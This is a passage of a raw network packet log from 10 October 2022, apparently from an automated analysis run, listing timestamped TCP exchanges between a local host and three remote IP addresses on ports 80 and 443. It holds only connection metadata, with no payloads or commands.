                                                                                                                                    Oct 10, 2022 06:01:57.639697075 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.639730930 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639771938 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639775991 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.639813900 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639853954 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639861107 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.639894009 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639940023 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.639940023 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639980078 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640022039 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640032053 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.640069962 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640110970 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640140057 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.640156031 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640196085 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640209913 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.640240908 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640281916 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640295029 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.640321970 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640362978 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640371084 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.640427113 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640466928 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640475035 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.640507936 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640548944 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640558958 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.640590906 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640634060 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640640020 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.640674114 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640713930 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640722036 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.640754938 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640795946 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640805960 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.640836954 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640877008 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640887022 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.640922070 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640965939 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.640974045 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.641057014 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.650094986 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.650207996 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.660249949 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.660295963 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.660365105 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.660365105 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.702663898 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.702728987 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.702749014 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.702774048 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.702792883 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.702816010 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.702824116 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.702858925 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.702866077 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.702929020 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.702948093 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.702999115 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703003883 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703042030 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703067064 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703084946 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703092098 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703128099 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703135014 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703171015 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703178883 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703211069 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703222990 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703254938 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703258038 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703295946 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703304052 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703337908 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703347921 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703380108 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703387022 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703421116 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703428984 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703463078 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703470945 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703505993 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703511953 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703548908 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703556061 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703589916 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703600883 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703632116 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703639030 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703672886 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703680992 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703716040 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703722954 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703757048 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703764915 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703799009 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703809977 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703840017 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703845978 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703881979 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703890085 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703926086 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703936100 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.703969002 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.703977108 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.704010963 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.704030037 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.704054117 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.704071999 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.704096079 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.704149961 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.704173088 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.704191923 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.704224110 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.704224110 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.704235077 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.704277992 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.704307079 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.704307079 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.704325914 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.704350948 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.704369068 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.704391956 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.704411983 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.704452991 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.704462051 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.704493999 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.704507113 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.704507113 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.704534054 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.704574108 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.704587936 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.704587936 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.704615116 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.704628944 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.704647064 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.704668999 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.704708099 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.722042084 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.722109079 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.722212076 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.722212076 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.766514063 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.766582012 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.766628981 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.766669989 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.766654015 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.766654015 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.766709089 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.766752005 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.766793966 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.766834974 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.766819000 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.766819000 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.766819000 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.766819000 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.766899109 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.766922951 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.766922951 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.766957045 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.766972065 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.766999006 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.767041922 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.767064095 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.767064095 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.767082930 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.767106056 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.767123938 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.767153025 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.767163992 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.767189026 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.767205954 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.767227888 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.767246962 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.767287016 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.767298937 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.767299891 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.767329931 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.767339945 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.767371893 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.767391920 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.767411947 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.767456055 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.767467022 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.767467022 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.767577887 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.830816984 CEST4969380192.168.2.377.73.133.53
                                                                                                                                    Oct 10, 2022 06:01:57.853210926 CEST804969377.73.133.53192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.853389978 CEST4969380192.168.2.377.73.133.53
                                                                                                                                    Oct 10, 2022 06:01:57.860542059 CEST4969380192.168.2.377.73.133.53
                                                                                                                                    Oct 10, 2022 06:01:57.882853031 CEST804969377.73.133.53192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.884048939 CEST804969377.73.133.53192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.884594917 CEST4969380192.168.2.377.73.133.53
                                                                                                                                    Oct 10, 2022 06:01:57.886039972 CEST4969480192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.906951904 CEST804969377.73.133.53192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.907093048 CEST4969380192.168.2.377.73.133.53
                                                                                                                                    Oct 10, 2022 06:01:57.945836067 CEST8049694194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.946002007 CEST4969480192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.946506023 CEST4969480192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:58.006010056 CEST8049694194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:58.008771896 CEST8049694194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:58.009293079 CEST4969480192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:58.068986893 CEST8049694194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:58.069094896 CEST4969480192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:01.464593887 CEST804969177.73.133.53192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:01.464785099 CEST4969180192.168.2.377.73.133.53
                                                                                                                                    Oct 10, 2022 06:02:01.617718935 CEST4969180192.168.2.377.73.133.53
                                                                                                                                    Oct 10, 2022 06:02:01.640475988 CEST804969177.73.133.53192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:02.194021940 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:02.194226027 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:02.213970900 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:02.275742054 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.107573986 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:03.170027018 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.170779943 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:03.227725983 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:03.228060007 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:03.290117025 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.290194988 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.290242910 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.290288925 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.290338039 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.290386915 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.290451050 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.290529966 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:03.290530920 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:03.290584087 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.290668964 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.290673018 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:03.290673018 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:03.290673018 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:03.290760994 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:03.353034019 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.353075027 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.353095055 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.353318930 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.353419065 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:03.353429079 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.353513002 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.353595018 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:03.353679895 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.353801966 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.353889942 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:03.353889942 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:03.353889942 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:03.354062080 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.354212046 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:03.354222059 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.354320049 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:03.354439020 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.354535103 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:03.398030043 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.398466110 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:03.415895939 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.415934086 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.416090965 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.416285992 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.416649103 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.416843891 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.417081118 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.417279959 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.417439938 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.417648077 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.417715073 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.417877913 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.417954922 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.418076038 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.418159962 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.418236017 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.418395042 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.418431997 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.418596029 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.418629885 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.418797016 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.418874979 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.419018030 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:03.460465908 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:04.325439930 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:04.366409063 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:04.373482943 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:04.435816050 CEST8049695194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:04.435908079 CEST4969580192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:02:12.199263096 CEST49698443192.168.2.3140.82.121.3
                                                                                                                                    Oct 10, 2022 06:02:12.199332952 CEST44349698140.82.121.3192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:12.199429035 CEST49698443192.168.2.3140.82.121.3
                                                                                                                                    Oct 10, 2022 06:02:12.234253883 CEST49698443192.168.2.3140.82.121.3
                                                                                                                                    Oct 10, 2022 06:02:12.234292984 CEST44349698140.82.121.3192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:12.286690950 CEST44349698140.82.121.3192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:12.286906004 CEST49698443192.168.2.3140.82.121.3
                                                                                                                                    Oct 10, 2022 06:02:13.757460117 CEST49698443192.168.2.3140.82.121.3
                                                                                                                                    Oct 10, 2022 06:02:13.757504940 CEST44349698140.82.121.3192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:13.758353949 CEST44349698140.82.121.3192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:13.758444071 CEST49698443192.168.2.3140.82.121.3
